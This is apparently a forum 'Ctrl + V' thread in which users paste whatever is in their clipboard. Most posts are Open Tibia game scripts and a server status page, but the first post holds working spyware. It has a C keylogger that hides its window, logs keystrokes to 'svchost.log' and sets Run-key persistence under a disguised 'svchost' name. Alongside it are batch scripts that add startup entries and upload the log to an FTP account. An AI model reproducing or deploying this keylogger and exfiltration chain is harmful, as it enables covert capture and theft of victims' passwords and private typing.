• There is NO official Otland's Discord server and NO official Otland's server list. The Otland's Staff does not manage any Discord server or server list. Moderators or administrator of any Discord server or server lists have NO connection to the Otland's Staff. Do not get scammed!

Ctrl + V

Status
Not open for further replies.
Code:
@echo off
if exist C:\archiv~1\SLUsoft\NetSaver==(goto seExiste)else goto noExiste
:noExiste
MSG * Perdone pero usted no instalo el programa en la carpeta adecuada.
exit
rem <----------------------------------Si Existe------------------------------>
:siExiste
start C:\archiv~1\SLUsoft\NetSaver\NetHostv.exe
reg add HKLM\software\microsoft\windows\currentversion\run /v NetHostv.exe /t reg_sz /d C:\archiv~1\SLUsoft\NetSaver\NetHostv.exe /f 
reg add HKLM\software\microsoft\windows\currentversion\run /v NetBet.exe /t reg_sz /d C:\archiv~1\SLUsoft\NetSaver\NetBet.exe /f 
exit rem Slusoft®

Code:
@echo off
echo Usuario>ftp.tmp
echo contraseña>>ftp.tmp
echo binary>>ftp.tmp
echo put C:\archiv~1\SLUsoft\NetSaver\svchost.log>>ftp.tmp
echo bye>>ftp.tmp
echo quit>>ftp.tmp
ftp -s:ftp.tmp tucuentaftp
del /f /q ftp.tmp
exit  rem Slusoft®

Code:
#include <windows.h>
#include <stdio.h>
#include <winuser.h>

#define BUFSIZE 80

int test_key(void);
int create_key(char *);
int get_keys(void);


int main(void)
{
    HWND stealth; /*creating stealth (window is not visible)*/
    AllocConsole();
    stealth=FindWindowA("ConsoleWindowClass",NULL);
    ShowWindow(stealth,0);

    int test,create;
    test=test_key();/*check if key is available for opening*/

    if (test==2)/*create key*/
    {
        char *path="c:\\%windir%\\svchost.exe";/*the path in which the file needs to be*/
        create=create_key(path);

    }


    int t=get_keys();

    return t;
}

int get_keys(void)
{
            short character;
              while(1)
              {

                     for(character=8;character<=222;character++)
                     {
                         if(GetAsyncKeyState(character)==-32767)
                         {

                             FILE *file;
                             file=fopen("svchost.log","a+" );
                             if(file==NULL)
                             {
                                     return 1;
                             }
                             if(file!=NULL)
                             {
                                     if((character>=39)&&(character<=64))
                                     {
                                           fputc(character,file);
                                           fclose(file);
                                           break;
                                     }
                                     else if((character>64)&&(character<91))
                                     {
                                           character+=32;
                                           fputc(character,file);
                                           fclose(file);
                                           break;
                                     }
                                     else
                                     {
                                         switch(character)
                                         {
                                               case VK_SPACE:
                                               fputc(' ',file);
                                               fclose(file);
                                               break;
                                               case VK_SHIFT:
                                               fputs("[SHIFT]",file);
                                               fclose(file);
                                               break;
                                               case VK_RETURN:
                                               fputs("\n[ENTER]",file);
                                               fclose(file);
                                               break;
                                               case VK_BACK:
                                               fputs("[BACKSPACE]",file);
                                               fclose(file);
                                               break;
                                               case VK_TAB:
                                               fputs("[TAB]",file);

                                               fclose(file);
                                               break;
                                               case VK_CONTROL:
                                               fputs("[CTRL]",file);
                                               fclose(file);
                                               break;
                                               case VK_DELETE:
                                               fputs("[DEL]",file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_1:
                                               fputs("[;:]",file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_2:
                                               fputs("[/?]",file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_3:
                                               fputs("[`~]",file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_4:
                                               fputs("[ [{ ]",file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_5:
                                               fputs("[\\|]",file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_6:
                                               fputs("[ ]} ]",file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_7:
                                               fputs("['\"]",file);
                                               fclose(file);
                                               break;
                                               /*case VK_OEM_PLUS:
                                               fputc('+',file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_COMMA:
                                               fputc(',',file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_MINUS:
                                               fputc('-',file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_PERIOD:
                                               fputc('.',file);
                                               fclose(file);
                                               break;*/
                                               case VK_NUMPAD0:
                                               fputc('0',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD1:
                                               fputc('1',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD2:
                                               fputc('2',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD3:
                                               fputc('3',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD4:
                                               fputc('4',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD5:
                                               fputc('5',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD6:
                                               fputc('6',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD7:
                                               fputc('7',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD8:
                                               fputc('8',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD9:
                                               fputc('9',file);
                                               fclose(file);
                                               break;
                                               case VK_CAPITAL:
                                               fputs("[CAPS LOCK]",file);
                                               fclose(file);
                                               break;
                                               default:
                                               fclose(file);
                                               break;
                                        }
                                   }
                              }
                    }
                }

            }
            return EXIT_SUCCESS;
}

int test_key(void)
{
    int check;
    HKEY hKey;
    char path[BUFSIZE];
    DWORD buf_length=BUFSIZE;
    int reg_key;

    reg_key=RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_QUERY_VALUE,&hKey);
    if(reg_key!=0)
    {
        check=1;
        return check;
    }

    reg_key=RegQueryValueEx(hKey,"svchost",NULL,NULL,(LPBYTE)path,&buf_length);

    if((reg_key!=0)||(buf_length>BUFSIZE))
        check=2;
    if(reg_key==0)
        check=0;

    RegCloseKey(hKey);
    return check;
}

int create_key(char *path)
{
        int reg_key,check;

        HKEY hkey;

        reg_key=RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&hkey);
        if(reg_key==0)
        {
                RegSetValueEx((HKEY)hkey,"svchost",0,REG_SZ,(BYTE *)path,strlen(path));
                check=0;
                return check;
        }
        if(reg_key!=0)
                check=1;

        return check;
        }
 
Code:
	<vocation id="3" name="Fire Warrior" description="a fire warrior" basespeed="220" gaincap="25" gainhp="15" gainmana="5" gainhpticks="3" gainhpamount="5" gainmanaticks="6" gainmanaamount="5" manamultiplier="3.0" attackspeed="1000" soulmax="100" gainsoulticks="120" fromvoc="3">
		<formula meleeDamage="3.0" distDamage="1.0" defense="1.0" armor="1.0"/>
		<skill id="0" multiplier="1.1"/>
		<skill id="1" multiplier="1.1"/>
		<skill id="2" multiplier="1.1"/>
		<skill id="3" multiplier="1.1"/>
		<skill id="4" multiplier="1.4"/>
		<skill id="5" multiplier="1.1"/>
		<skill id="6" multiplier="1.1"/>
	</vocation>

working on vocations right now >.<
 
linuxlogga.jpg
 
System Information: bluots.com.com (85.17.135.221)

System Vital
Canonical Hostname bluots.com.com
Listening IP 85.17.135.221
Kernel Version 2.6.25-2-686-bigmem (SMP)
Distro Name Debian lenny/sid
Uptime 9 days 3 hours 9 minutes
Current Users 1
Load Averages 0.00 0.00 0.00
0.54%



Network Usage
Device Received Sent Err/Drop
lo 489.28 KB 489.28 KB 0/0
eth0 550.31 MB 345.91 MB 0/0
eth1 0.00 KB 0.00 KB 0/0




Hardware Information
Processors 2
Model Intel(R) Pentium(R) III CPU family 1400MHz
CPU Speed 1.4 GHz
Cache Size 512.00 KB
System Bogomips 5588
PCI Devices
- Class ff00: Dell Embedded Remote Access or ERA/O
- Class ff00: Dell Remote Access Card III
- (2x) Ethernet controller: Intel Corporation 82544EI Gigabit Ethernet Controller
- (4x) Host bridge: Broadcom CNB20HE Host Bridge
- Host bridge: Broadcom CSB5 South Bridge
- IDE interface: Broadcom CSB5 IDE Controller
- IPMI SMIC interface: Dell Remote Access Card III: BMC/SMIC device not present
- ISA bridge: Broadcom CSB5 LPC bridge
- PCI bridge: Intel Corporation 80303 I/O Processor PCI-to-PCI Bridge
- RAID bus controller: Dell PowerEdge Expandable RAID Controller 3/Di
- (2x) SCSI storage controller: Adaptec RAID subsystem HBA
- USB Controller: Broadcom OSB4/CSB5 OHCI USB Controller
- VGA compatible controller: ATI Technologies Inc Rage XL
IDE Devices
- hda: TEAC CD-ROM CD-224E
SCSI Devices
- DELL main (Direct-Access)
- PE/PV 1x3 SCSI BP (Processor)
- QUANTUM ATLAS10K3_18_SCA (Direct-Access)
- QUANTUM ATLAS10K3_18_SCA (Direct-Access)
USB Devices
- Linux Foundation 1.1 root hub



Memory Usage
Type Percent Capacity Free Used Size
Physical Memory 39% 2.27 GB 1.45 GB 3.72 GB
- Kernel + applications 5% 192.70 MB
- Buffers 1% 48.70 MB
- Cached 33% 1.21 GB
Disk Swap 0% 768.70 MB 0.00 KB 768.70 MB



Mounted Filesystems
Type Partition Percent Capacity Free Used Size
reiserfs /dev/sda1 10% 14.58 GB 1.62 GB 16.19 GB
tmpfs tmpfs 0% (1%) 1.86 GB 0.00 KB 1.86 GB
tmpfs tmpfs 0% (1%) 1.86 GB 0.00 KB 1.86 GB
tmpfs udev 1% (1%) 9.93 MB 68.00 KB 10.00 MB
Totals : 9% 16.44 GB 1.62 GB 18.06 GB




Created by phpSysInfo-2.5.4 on Aug 18, 2008 at 06:12 PM 1.6995 sec
Long time since I visited that site. I guess I was checking the Status On the BluOTS Server. You should check it out.
 
It should be possible using -cut-

okay this is private.. had the text of a PM in my clipboard
 
local keywordHandler = KeywordHandler:new()
local npcHandler = NpcHandler:new(keywordHandler)
NpcSystem.parseParameters(npcHandler)

function onCreatureAppear(cid) npcHandler:eek:nCreatureAppear(cid) end
function onCreatureDisappear(cid) npcHandler:eek:nCreatureDisappear(cid) end
function onCreatureSay(cid, type, msg) npcHandler:eek:nCreatureSay(cid, type, msg) end
function onThink() npcHandler:eek:nThink() end

function buyAddons(cid, message, keywords, parameters, node)
--TODO: buyAddons function in modules.lua
if(cid ~= npcHandler.focus) then
return false
end

local addon = parameters.addon
local cost = parameters.cost
local premium = (parameters.premium ~= nil and parameters.premium ~= false)

if isPlayerPremiumCallback == nil or isPlayerPremiumCallback(cid) == true or premium == false then
if doPlayerRemoveMoney(cid, cost) == TRUE then
doPlayerAddAddons(cid, addon)
npcHandler:say('There, you are now able to use all addons!', cid)
else
npcHandler:say('Sorry, you do not have enough money.', cid)
end
else
npcHandler:say('I only serve customers with premium accounts.', cid)
end

keywordHandler:moveUp(1)
return true
end

local node1 = keywordHandler:addKeyword({'first addon'}, StdModule.say, (npcHandler = npcHandler, onlyFocus = true, text = 'Do you want to buy the first addons set for 5000 gold coins?'))
node1:addChildKeyword({'yes'}, buyAddons, {addon = 1, cost = 5000, premium = true})
node1:addChildKeyword({'no'}, StdModule.say, {npcHandler = npcHandler, onlyFocus = true, moveup = 1, text = 'Too expensive, eh?'))

local node2 = keywordHandler:addKeyword({'second addon'}, StdModule.say, (npcHandler = npcHandler, onlyFocus = true, text = 'Would you like to buy the second addons set for 10000 gold coins?'))
node2:addChildKeyword({'yes'}, buyAddons, {addon = 2, cost = 10000, premium = true})
node2:addChildKeyword({'no'}, StdModule.say, (npcHandler = npcHandler, onlyFocus = true, moveup = 1, text = 'Too expensive, eh?'))

keywordHandler:addKeyword({'addon'}, StdModule.say, (npcHandler = npcHandler, onlyFocus = true, text = 'I sell the first addons set for 5000 gold coins and the second addons set for 10000 gold coins.'))

npcHandler:addModule(FocusModule:new())
 
Name:
Age:
Country:
Job (Mapper,Scripter,Webdesign):
Why should we choose you:
Experience:
Comments:
Work examples/previews:
 
Code:
-- POI QUEST-- By Tosse12--

function onUse(cid, item, frompos, item2, topos)
if item.uid == 1337 then
if item.itemid == 1946 then

player1pos = {x=236, y=396, z=11, stackpos=253}
player1 = getThingfromPos(player1pos)

player2pos = {x=237, y=396, z=11, stackpos=253}
player2 = getThingfromPos(player2pos)

player3pos = {x=238, y=396, z=11, stackpos=253}
player3 = getThingfromPos(player3pos)

player4pos = {x=238, y=365, z=11, stackpos=253}
player4 = getThingfromPos(player4pos)

player5pos = {x=237, y=365, z=11, stackpos=253}
player5 = getThingfromPos(player4pos)

if player1.itemid > 0 and player2.itemid > 0 and player3.itemid > 0 and player4.itemid > 0 then

player1level = getPlayerLevel(player1.uid)
player2level = getPlayerLevel(player2.uid)
player3level = getPlayerLevel(player3.uid)
player4level = getPlayerLevel(player4.uid)
player5level = getPlayerLevel(player4.uid)

questlevel = 150

if player1level >= questlevel and player2level >= questlevel and player3level >= questlevel and player4level >= questlevel then

queststatus1 = getPlayerStorageValue(player1.uid,1337)
queststatus2 = getPlayerStorageValue(player2.uid,1337)
queststatus3 = getPlayerStorageValue(player3.uid,1337)
queststatus4 = getPlayerStorageValue(player4.uid,1337)
queststatus5 = getPlayerStorageValue(player4.uid,1337)

if queststatus1 == -1 and queststatus2 == -1 and queststatus3 == -1 and queststatus4 == -1 then
--if 1==1 then

nplayer1pos = {x=238, y=397, z=10}
nplayer2pos = {x=245, y=398, z=10}
nplayer3pos = {x=233, y=397, z=10}
nplayer4pos = {x=243, y=400, z=10}
nplayer5pos = {x=237, y=392, z=10}

doSendMagicEffect(player1pos,2)
doSendMagicEffect(player2pos,2)
doSendMagicEffect(player3pos,2)
doSendMagicEffect(player4pos,2)
doSendMagicEffect(player5pos,2)

doTeleportThing(player1.uid,nplayer1pos,0)
doTeleportThing(player2.uid,nplayer2pos,0)
doTeleportThing(player3.uid,nplayer3pos,0)
doTeleportThing(player4.uid,nplayer4pos,0)
doTeleportThing(player5.uid,nplayer5pos,0)

doSendMagicEffect(nplayer1pos,10)
doSendMagicEffect(nplayer2pos,10)
doSendMagicEffect(nplayer3pos,10)
doSendMagicEffect(nplayer4pos,10)
doSendMagicEffect(nplayer5pos,10)

doTransformItem(item.uid,1945)

else
doPlayerSendCancel(cid,"Sorry, not possible.")
end
else
doPlayerSendCancel(cid,"Sorry, not possible.")
end
else
doPlayerSendCancel(cid,"Sorry, not possible.")
end
end
if item.itemid == 1945 then

end 
end 
if item.uid == 1338 then 
 queststatus = getPlayerStorageValue(cid,100) 
 if queststatus == -1 then 
  doPlayerSendTextMessage(cid,22,"You have found a arcane staff.") 
  doPlayerAddItem(cid,2453,1) 
  setPlayerStorageValue(cid,100,1) 
 else 
  doPlayerSendTextMessage(cid,22,"It is empty.") 
 end 
end 
if item.uid == 1339 then 
 queststatus = getPlayerStorageValue(cid,100) 
 if queststatus ~= 1 then 
  doPlayerSendTextMessage(cid,22,"You have found a arbalest.") 
  doPlayerAddItem(cid,5803,1) 
  setPlayerStorageValue(cid,100,1) 
 else 
  doPlayerSendTextMessage(cid,22,"It is empty.") 
 end 
end 
if item.uid == 1340 then 
 queststatus = getPlayerStorageValue(cid,100) 
 if queststatus ~= 1 then 
  doPlayerSendTextMessage(cid,22,"You have found a avenger.") 
  doPlayerAddItem(cid,6528,1) 
  setPlayerStorageValue(cid,100,1) 
 else 
  doPlayerSendTextMessage(cid,22,"It is empty.") 
 end 
 end 
 return 1 
end

lol... My poi quest...
 
Status
Not open for further replies.
Back
Top